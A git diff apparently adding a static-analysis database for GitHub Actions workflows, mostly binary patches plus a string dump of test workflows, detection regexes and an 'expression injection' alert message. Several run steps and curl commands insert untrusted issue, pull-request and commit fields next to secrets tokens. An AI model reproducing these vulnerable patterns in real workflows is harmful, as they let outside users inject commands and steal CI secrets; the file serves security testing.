z!bL=VW*bkqIuVwFr6wM1nhw)^OHgTeZ{fSE2U9*X!p-I^hH2mSuPW)>3DcgrV)$?#JeO3Zp8UfwpG8jv`EXE-&tUt_jn3^@MEF=CN&R4x8pIW!s1< zJb&&AQ_ZdI^&_{y{O}dk%=Dcw<#udw$J=8t<+fnRKmR<;3-^4O#>Bz2){-`v^2ux) zp3{c%`7nL=O^dAeLpH8A=&9cdQ$4i{LVt9_R1<|N=3zff{dD#Wr4O;b&VNlr06!#X ztO5L8o-j;#UNbl`MGmID+N3xrr3BL%Z2q)DSR1DNIr0*f`Y^3^+0I+_3t{>#A#E6I zw-Khg$=TK)ItEieJ8JqoBH(}T=)gY?(JG9OIiElDNOmiYum8u9Zc)kHSV(4AZu&?!F~>Yn9!uq*67s=cEK4ucbl45u%cjlV;Hzw>4UG{fnzsFu#RqjRty;SY-OP6P0MSo~z7 z%GSB~vjMo_MUlqxc_a7F265fCJ#Z%CnQc)qYV&bc;Eg(bSCimKxV*jUl94(7>>rM* zt+{y?-UbJK%*T za1>q$SFCz{{UMCuaGxJ@6Gw0gERZUaYXrN)8KoBDv9KmAY{YT72V=`I+rll9cq~VL 
z8wb^!hRuO>5nt%3QoIA608d%5_eTUg6?R!2eX(b5?K)4bjpobSE>)4U`d{pGK-@xy)Y z-MOsq@Evg~hbd>ya$Tirn8y7ctHxIc)3{U8i{qZcl(U}Px574<>QH$^^X3Pb=D5;m zrR5MCUo-PZrjXT0o3^K&nldo;b2IPCtnsiAJkg*uSq-NApJ$evYQdC)z@m=x1~AoO z*^cm)vtc@$iTRzq)-av5J>Mf;*0Awe-dVj{;31-KR9R)AXpZUwj%;8uWJ0d57j72sBYTLEqbxE0`5;Qwa@{ttM} Bc#Z%7 literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/strings/0/pageDump/page-000000000 b/db/db-yaml/default/strings/0/pageDump/page-000000000 new file mode 100644 index 00000000000..eec9231ab07 --- /dev/null +++ b/db/db-yaml/default/strings/0/pageDump/page-000000000 
@@ -0,0 +1,2 @@ +tag:yaml.org,2002:(.*)mapstrboolseqintworkflow_call\$\{\{\s*[A-Za-z0-9_\[\]\*\(\)\.\-]+\s*\}\}octo-org/source-repo/.github/workflows/workflow.yml*output.workflow-outputFooahmadnassri/action-changed-filesoutput.filesPR changed filesoutput.jsondorny/paths-filteroutput.changesfranzdiebold/github-env-vars-actionoutput.CI_PR_DESCRIPTIONPR bodyoutput.CI_PR_TITLEPR titlejitterbit/get-changed-filesoutput.alloutput.addedoutput.modifiedoutput.removedoutput.renamedoutput.added_modifiedoutput.deletedkhan/pull-request-comment-triggeroutput.comment_bodypull_request_commenttj-actions/branch-namesoutput.current_branchPR current branchoutput.head_ref_branchPR head branchoutput.ref_branchBranch tirggering workflow runtj-actions/changed-filesoutput.added_filesoutput.copied_filesoutput.deleted_filesoutput.modified_filesoutput.renamed_filesoutput.all_old_new_renamed_filesoutput.type_changed_files${{ steps.changed-files.outputs.all_changed_files }}${{ secrets.DYNAMOBOTTOKEN }}${{ github.event.issue.url }}${{ github.actor }}${{ env.template }}${{ env.acceptable_missing_info }}${{ secrets.GITHUB_TOKEN }}${{env.comment_intro}}${{env.close_issue_comment}}${{env.info_needed}}${{env.issue_label}}${{env.needs_more_info_comment}}${{env.specific_info}}${{env.analysis_response}}${{env.greetings_comment}}${{ env.issue_json_string }}${{ github.repository }}${{github.event.after}}${{ env.ISSUE_BODY_PARSED }}${{env.user_name}}${{env.auto_branch}}${{env.destination_branch}}${{env.pr_message}}${{ github.event.discussion.title }}${{ github.event.discussion.body }}${{ github.event.pages[1].title }}${{ github.event.pages[11].title }}${{ github.event.pages[0].page_name }}${{ github.event.pages[2222].page_name }}${{ toJSON(github.event.pages.*.title) }}${{ steps.trim-url.outputs.trimmed_url }}${{needs.job1.outputs.job_output}}${{ env.global_env }}${{ env.test }}${{ env.job_env }}${{ env.step_env }}\$\{\{\s*([A-Za-z0-9_\[\]\*\((\)\.\-]+)\s*\}\}${{ matrix.language 
}}${{steps.no-step.outputs.foo}}github.event.comment.bodyinputs.who-to-greet${{ github.event.pull_request.title }}${{ github.event.pull_request.body }}${{ github.event.pull_request.head.label }}${{ github.event.pull_request.head.repo.default_branch }}${{ github.event.pull_request.head.repo.description }}${{ github.event.pull_request.head.repo.homepage }}${{ github.event.pull_request.head.ref }}${{ github.event.review.body }}output.unmerged_filesoutput.unknown_filesoutput.all_changed_and_modified_filesoutput.all_changed_filesoutput.other_changed_filesoutput.all_modified_filesoutput.other_modified_filesoutput.other_deleted_filesoutput.modified_keysoutput.changed_keystj-actions/verify-changed-filesoutput.changed-filestzkhan/pr-update-actionoutput.headMatchxt0rted/slash-command-actionoutput.command-arguments${{ github.head_ref }}${{ github.event.commits[11].message }}${{ github.event.commits[11].author.email }}${{ github.event.commits[11].author.name }}${{ github.event.head_commit.author.email }}${{ github.event.head_commit.author.name }}${{ github.event.head_commit.committer.email }}${{ github.event.head_commit.committer.name }}${{ github.event.commits[11].committer.email }}${{ github.event.commits[11].committer.name }}${{steps.summary.outputs.value}}${{steps.summary.outputs.foo}}${{ steps.source.outputs.all_changed_files_count }}${{ github.event.workflow_run.display_title }}${{ github.event.workflow_run.head_commit.message }}${{ github.event.workflow_run.head_commit.author.email }}${{ github.event.workflow_run.head_commit.author.name }}${{ github.event.workflow_run.head_commit.committer.email }}${{ github.event.workflow_run.head_commit.committer.name }}${{ github.event.workflow_run.head_branch }}${{ github.event.workflow_run.head_repository.description 
}}github.event.issue.titleenv.ISSUE_TITLEsteps.remove_quotations.outputs.replacedsteps.changed-files.outputs.all_changed_filesgithub.event.issue.bodyenv.content_analysis_responsesecrets.DYNAMOBOTTOKENgithub.event.issue.urlgithub.actorenv.ISSUE_BODYenv.templateenv.acceptable_missing_infosecrets.GITHUB_TOKENenv.comment_introenv.close_issue_commentenv.info_neededenv.issue_labelenv.needs_more_info_commentenv.specific_infoenv.analysis_responseenv.greetings_commentsteps.remove_quotes.outputs.replacedgithub.event.issue.numberenv.issue_json_stringsecrets.DYNAMO_ISSUES_TOKENgithub.repositorygithub.event.aftergithub.event.commits[0].messageenv.ISSUE_BODY_PARSEDenv.user_nameenv.auto_branchenv.destination_branchenv.pr_messagegithub.event.discussion.titlegithub.event.discussion.bodygithub.event.pages[1].titlegithub.event.pages[11].titlegithub.event.pages[0].page_namegithub.event.pages[2222].page_nametoJSON(github.event.pages.*.title)steps.extract-url.outputs.initial_urlsteps.curl.outputs.redirected_urlsteps.trim-url.outputs.trimmed_urlsteps.step.outputs.valuesteps.source.outputs.all_changed_filesalways()needs.job1.outputs.job_outputenv.global_envenv.testenv.job_envenv.step_envsteps.set-matrix.outputs.all_changed_filesfromJSON(needs.create-matrix.outputs.matrix)matrix.languagegithub.event.head_commit.messagesteps.no-step.outputs.foogithub.event.pull_request.titlegithub.event.pull_request.bodygithub.event.pull_request.head.labelgithub.event.pull_request.head.repo.default_branchgithub.event.pull_request.head.repo.descriptiongithub.event.pull_request.head.repo.homepagegithub.event.pull_request.head.refgithub.event.review.bodygithub.head_refgithub.event.commits[11].messagegithub.event.commits[11].author.emailgithub.event.commits[11].author.namegithub.event.head_commit.author.emailgithub.event.head_commit.author.namegithub.event.head_commit.committer.emailgithub.event.head_commit.committer.namegithub.event.commits[11].committer.emailgithub.event.commits[11].committer.namesteps.summary
.outputs.valuesteps.summary.outputs.foosteps.source.outputs.all_changed_files_countsteps.step2.outputs.teststeps.step0.outputs.valuesteps.step1.outputs.MSGgithub.event.workflow_run.display_titlegithub.event.workflow_run.head_commit.messagegithub.event.workflow_run.head_commit.author.emailgithub.event.workflow_run.head_commit.author.namegithub.event.workflow_run.head_commit.committer.emailgithub.event.workflow_run.head_commit.committer.namegithub.event.workflow_run.head_branchgithub.event.workflow_run.head_repository.descriptionmerge.*/(([^/]*?)(?:\.([^.]*))?)argus_case_study.ymlargus_case_studyymlchanged-files.ymlcomment_issue.ymlcomment_issuecomment_issue_newline.ymlcomment_issue_newlinecross1.ymlcross1cross2.ymlcross2cross3.ymlcross3discussion.ymldiscussion_comment.ymlgollum.ymlimage_link_generator.ymlimage_link_generatorinter-job.ymlinter-jobissues.yamlyamlmatrix.ymlno-flow1.ymlno-flow1no-flow2.ymlno-flow2pull_request_review.ymlpull_request_review_comment.ymlpull_request_target.ymlpush.ymlsimple1.ymlsimple2.ymlsimple2test.ymlworkflow_run.ymlaction.ymlaction([^/]+)/([^/@]+)@(.+)v2frabertreplace-string-action1.2v4tj-actionsv40github-scriptv3actions-ecosystemaction-regex-matchv2.5setup-dotnetv1.2mad9000actions-find-and-replace-string3([^/]+)/([^/]+)/([^@]+)@(.+)actions/checkoutfrabert/replace-string-actionactions/github-scriptactions-ecosystem/action-regex-matchactions/setup-dotnetmad9000/actions-find-and-replace-string\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*author\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*author\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*committer\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*committer\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*message\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*author\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*author\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*commi
tter\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*committer\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*message\b\bgithub\s*\.\s*head_ref\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*body\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*title\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*ref\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*label\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*repo\s*\.\s*homepage\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*repo\s*\.\s*description\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*repo\s*\.\s*default_branch\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_branch\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*display_title\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*message\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_repository\b\s*\.\s*description\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*author\b\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*author\b\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*committer\b\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*committer\b\s*\.\s*email\bexit name: Issue Workflowexit name: CIexit on: issue_commentexit name: I ... edicterexit name: Cherry pickingexit on: discussionexit on: dis ... commentexit on: gollumexit name: I ... cessingexit on: pushexit on: issuesexit name: " ... nguage"exit on: pul ... _reviewexit on: pul ... commentexit on: pul ... _targetexit on:exit name: 'test'exit name: 'Hello World'enter name: Issue Workflowenter name: CIenter on: issue_commententer name: I ... edicterenter name: Cherry pickingenter on: discussionenter on: dis ... commententer on: gollumenter name: I ... cessingenter on: pushenter on: issuesenter name: " ... nguage"enter on: pul ... 
_reviewenter on: pul ... commententer on: pul ... _targetenter on:enter name: 'test'enter name: 'Hello World'exit name: Issue Workflow (normal)exit name: CI (normal)exit on: issue_comment (normal)exit name: I ... edicter (normal)exit name: Cherry picking (normal)exit on: discussion (normal)exit on: dis ... comment (normal)exit on: gollum (normal)exit name: I ... cessing (normal)exit on: push (normal)exit on: issues (normal)exit name: " ... nguage" (normal)exit on: pul ... _review (normal)exit on: pul ... comment (normal)exit on: pul ... _target (normal)exit on: (normal)exit name: 'test' (normal)exit name: 'Hello World' (normal)input testocto-org/sink-repo/.github/workflows/workflow.ymlinput.config-pathexpression-injectionconfig-path.github/workflows/argus_case_study.yml.github/workflows.github.github/workflows/changed-files.yml.github/workflows/comment_issue.yml.github/workflows/comment_issue_newline.yml.github/workflows/cross1.yml.github/workflows/cross2.yml.github/workflows/cross3.yml.github/workflows/discussion.yml.github/workflows/discussion_comment.yml.github/workflows/gollum.yml.github/workflows/image_link_generator.yml.github/workflows/inter-job.yml.github/workflows/issues.yaml.github/workflows/matrix.yml.github/workflows/no-flow1.yml.github/workflows/no-flow2.yml.github/workflows/pull_request_review.yml.github/workflows/pull_request_review_comment.yml.github/workflows/pull_request_target.yml.github/workflows/push.yml.github/workflows/simple1.yml.github/workflows/simple2.yml.github/workflows/test.yml.github/workflows/workflow_run.ymlaction1/action.ymlaction1action2/action.ymlaction2action.yaml\bsteps\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\btoJSON\(steps\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)fromJSON\(steps\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)\binputs\.([A-Za-z0-9_-]+)\b\bneeds\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\btoJSON\(needs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)fromJSON\(needs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9
_-]+)\)toJSON\(inputs\.([A-Za-z0-9_-]+)\)fromJSON\(inputs\.([A-Za-z0-9_-]+)\)\bgithub\.event\.inputs\.([A-Za-z0-9_-]+)\btoJSON\(github\.event\.inputs\.([A-Za-z0-9_-]+)\)fromJSON\(github\.event\.inputs\.([A-Za-z0-9_-]+)\)\bjobs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\btoJSON\(jobs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)fromJSON\(jobs\.([A-Za-z0-9_-]+)\.outputs\.([A-Za-z0-9_-]+)\)\bmatrix\.([A-Za-z0-9_-]+)\btoJSON\(matrix\.([A-Za-z0-9_-]+)\)fromJSON\(matrix\.([A-Za-z0-9_-]+)\)\benv\.([A-Za-z0-9_-]+)\btoJSON\(env\.([A-Za-z0-9_-]+)\)fromJSON\(env\.([A-Za-z0-9_-]+)\)Job: redirectIssueJob: changed_filesJob: echo-chamberJob: echo-chamber2Job: echo-chamber3Job: checkIssueInformationJob: issue_type_PredicterJob: cherry_pickJob: process-image-urlJob: job1Job: job2Job: create-matrixJob: analyzeJob: simple1Job outputs nodeUses StepRun StepRun Step: check-infoRun Step: extract-urlRun Step: curlRun Step: trim-urlRun Step: sinkRun Step: no-stepRun Step: flowRun Step: no-flowRun Step: step1Run Step: step2Uses Step: remove_quotationsUses Step: changed-filesUses Step: regex-matchUses Step: remove_quotesUses Step: sourceUses Step: stepUses Step: set-matrixUses Step: summaryUses Step: 
step0octo-org/this-repo/.github/workflows/workflow.ymltaintocto-org/summary-repo/.github/workflows/workflow.ymlakhileshns/heroku-deployinput.branchoutput.statusandroid-actions/setup-androidinput.cmdline-tools-versionoutput.ANDROID_COMMANDLINE_TOOLS_VERSIONapple-actions/import-codesign-certsinput.keychain-passwordoutput.keychain-passwordashley-taylor/read-json-property-actioninput.jsonoutput.valueashley-taylor/regex-property-actioninput.replacementinput.valueaszc/change-string-case-actioninput.stringoutput.capitalizedinput.replace-withoutput.uppercaseoutput.lowercaseaws-actions/configure-aws-credentialsinput.aws-access-key-idenv.AWS_ACCESS_KEY_IDsecret.AWS_ACCESS_KEY_IDinput.aws-secret-access-keyenv.AWS_SECRET_ACCESS_KEYsecret.AWS_SECRET_ACCESS_KEYinput.aws-session-tokenenv.AWS_SESSION_TOKENsecret.AWS_SESSION_TOKENbobheadxi/deploymentsinput.envoutput.envbufbuild/buf-breaking-actioninput.buf_tokenenv.BUF_TOKENbufbuild/buf-lint-actioncachix/cachix-actioninput.signingKeyenv.CACHIX_SIGNING_KEYcoursier/cache-actioninput.pathenv.COURSIER_CACHEcrazy-max/ghaction-import-gpginput.fingerprintoutput.fingerprintcsexton/release-asset-actioninput.release-urloutput.urldelaguardo/setup-clojureinput.bootenv.BOOT_VERSIONoutput.replacedgame-ci/unity-test-runnerinput.artifactsPathoutput.artifactsPathgetsentry/action-releaseinput.versionoutput.versioninput.version_prefixgithub/codeql-actioninput.outputoutput.sarif-outputgradle/gradle-build-actioninput.cache-encryption-keyenv.GRADLE_ENCRYPTION_KEYinput.build-scan-terms-of-service-agreeenv.BUILD_SCAN_TERMS_OF_SERVICE_AGREEinput.build-scan-terms-of-service-urlenv.BUILD_SCAN_TERMS_OF_SERVICE_URLhaya14busa/action-condinput.if_trueinput.if_falsehexlet/project-actioninput.mount-pathenv.PWDjsdaniell/create-jsoninput.nameoutput.successfullyinput.dirjwalton/gh-ecr-pushinput.imageoutput.imageUrllarsoner/circleci-artifacts-redirector-actioninput.artifact-pathinput.sourceinput.replacemattdavis0351/actionsinput.image-nameinput.tagmetro-digital/setup-t
ools-for-waasinput.gcp_sa_keyenv.GCLOUD_PROJECTmishakav/pytest-coverage-commentinput.multiple-filesoutput.summaryReportmymindstorm/setup-emsdkinput.actions-cache-folderenv.EMSDKruby/setup-rubyinput.ruby-versionoutput.ruby-prefixsalsify/action-detect-and-tag-new-versioninput.tag-templateoutput.tagshallwefootball/upload-s3-actioninput.destination_diroutput.object_keyshogo82148/actions-setup-perlinput.working-directoryenv.PERL5LIBsuisei-cn/actions-download-fileinput.filenameoutput.filenametimheuer/base64-to-fileinput.fileNameoutput.filePathinput.fileDirbranchcmdline-tools-versionkeychain-passwordjsonreplacementaws-access-key-idaws-secret-access-keyaws-session-tokenbuf_tokensigningKeyfingerprintrelease-urlbootartifactsPathversionversion_prefixoutputcache-encryption-keybuild-scan-terms-of-service-agreebuild-scan-terms-of-service-urlif_trueif_falsemount-pathdirartifact-pathimage-nametaggcp_sa_keymultiple-filesactions-cache-folderruby-versiontag-templatedestination_dirworking-directoryfilenamefileNamefileDir +echo "Bad Issue Title Format"exit 1echo "content_analysis_response=$(pwsh .\\.github\\scripts\\title_analyzer.ps1)" >> $GITHUB_ENVcurl -v -u admin:${{ secrets.DYNAMOBOTTOKEN }} -d '{"labels": ["${{env.content_analysis_response}}"]}' ${{ github.event.issue.url }}/labelsecho "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}" )" >> $GITHUB_ENVcurl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.close_issue_comment}} ${{env.info_needed}}"}' ${{ github.event.issue.url }}/commentscurl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X PATCH -d '{"state": "closed"}' ${{ github.event.issue.url }}curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"labels": ["${{env.issue_label}}"]}' ${{ github.event.issue.url }}/labelscurl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.needs_more_info_comment}} ${{env.specific_info}} 
${{env.analysis_response}}.\n\n${{env.info_needed}}"}' ${{ github.event.issue.url }}/commentsecho urldecode ${{env.issue_label}}curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X DELETE ${{ github.event.issue.url }}/labels/$(echo -ne "${{env.issue_label}}" | xxd -plain | tr -d '\n' | sed 's/\(..\)/%\1/g')curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.greetings_comment}}"}' ${{ github.event.issue.url }}/commentsecho "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}")" >> $GITHUB_ENVecho "parsed_issue_body="$(pwsh .\\.github\\scripts\\issue_body_cleaner.ps1 )"" >> $GITHUB_ENVecho "issue_json_string="$(pwsh .\\.github\\scripts\\get_issue_json_body.ps1 "$ISSUE_NUMBER")"" >> $GITHUB_ENVgh issue edit ${{ github.event.issue.number }} --add-label "Wishlist" --repo ${{ github.repository }}gh issue edit ${{ github.event.issue.number }} --add-label "NotMLEvaluated" --repo ${{ github.repository }}echo "destination_branch=$(pwsh .\\.github\\scripts\\cherry_pick_check.ps1 "${{ env.ISSUE_BODY_PARSED }}" )" >> $GITHUB_ENVgit config user.name "${{env.user_name}}"git fetch --allgit checkout -b ${{env.auto_branch}} origin/${{env.destination_branch}}git cherry-pick -x ${{github.event.after}} --strategy-option theirsgit push -u origin ${{env.auto_branch}}hub pull-request -b "${{env.destination_branch}}" -h "${{env.auto_branch}}" -m "${{env.pr_message}}"echo "::set-output name=initial_url::$BODY"echo "redirected_url=$(echo $INITIAL_URL)" >> $GITHUB_OUTPUTecho "trimmed_url=$(echo $REDIRECTED_URL)" >> "$GITHUB_OUTPUT"Write-Output "::set-output 
name=MSG::$ENV{BODY}".*::set-output\s+name=(.*)::.*.*echo\s*"(.*)=.*\s*>>\s*(")?\$GITHUB_OUTPUT.*$BODY$MSG$INITIAL_URL$REDIRECTED_URL${BODY${MSG${INITIAL_URL${REDIRECTED_URL$ENV{BODY$ENV{MSG$ENV{INITIAL_URL$ENV{REDIRECTED_URLoutput.foooutput.all_changed_files_countjob_output]test]matrix]MSG]value]replaced]initial_url]redirected_url]trimmed_url][job_output][matrix][MSG][value][replaced][initial_url][redirected_url][trimmed_url] [job_output] [test] [matrix] [MSG] [value] [replaced] [initial_url] [redirected_url] [trimmed_url]Uses Step: remove_quotations [replaced]Run Step: extract-url [initial_url]Run Step: curl [redirected_url]Run Step: trim-url [trimmed_url]Job outputs node [job_output]Uses Step: step [value]Job outputs node [matrix]Uses Step: summary [value]Uses Step: step0 [value]Run Step: step1 [MSG]Run Step: step2 [test]semmle.labelPotential expression injection, which may be controlled by an external user. \ No newline at end of file 
diff --git a/db/db-yaml/default/yaml.rel b/db/db-yaml/default/yaml.rel new file mode 100644 index 0000000000000000000000000000000000000000..68a7a887f651d38ec0cd273155e841acc2d28904 GIT binary patch literal 33384 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 